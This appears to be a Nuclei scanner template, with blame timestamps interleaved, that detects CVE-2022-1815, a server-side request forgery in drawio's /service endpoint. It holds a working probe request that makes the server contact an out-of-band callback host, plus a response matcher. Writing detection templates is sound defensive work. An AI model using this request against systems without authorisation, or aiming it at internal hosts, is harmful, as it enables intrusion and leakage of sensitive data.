2022-07-29 12:55:26 +00:00
id : CVE-2022-1815
info :
2022-07-29 15:40:00 +00:00
name : Drawio < 18.1.2 - Server Side Request Forgery
2022-07-29 12:55:26 +00:00
author : amit-jd
2022-07-29 15:56:00 +00:00
severity : high
2022-07-29 14:05:15 +00:00
description : |
2022-07-29 14:07:09 +00:00
SSRF in /service endpoint in jgraph/drawio prior to 18.1.2. Exposure of Sensitive Information to an Unauthorized Actor in GitHub repository jgraph/drawio prior to 18.1.2.
2022-07-29 12:55:26 +00:00
reference :
- https://huntr.dev/bounties/6e856a25-9117-47c6-9375-52f78876902f/
2022-07-29 14:05:15 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-1815
2022-07-29 15:56:00 +00:00
- https://huntr.dev/bounties/6e856a25-9117-47c6-9375-52f78876902f
- https://github.com/jgraph/drawio/commit/c287bef9101d024b1fd59d55ecd530f25000f9d8
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
cve-id : CVE-2022-1815
cwe-id : CWE-918
2022-07-29 14:28:11 +00:00
metadata :
2022-07-29 15:56:00 +00:00
verified : "true"
2022-08-27 04:41:18 +00:00
tags : huntr,cve,cve2022,drawio,ssrf,oast,oss,jgraph
2022-07-29 12:55:26 +00:00
requests :
- raw :
- |
2022-07-29 15:40:00 +00:00
GET /service/0/test.oast.me HTTP/2
2022-07-29 12:55:26 +00:00
Host : {{Hostname}}
matchers :
2022-07-29 15:40:00 +00:00
- type : dsl
dsl :
- "contains(body, 'Interactsh Server')"
- status_code == 200
condition : and